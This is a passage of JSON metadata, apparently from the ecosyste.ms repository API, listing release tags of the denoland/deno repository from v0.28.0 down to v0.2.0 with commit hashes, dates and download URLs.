pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste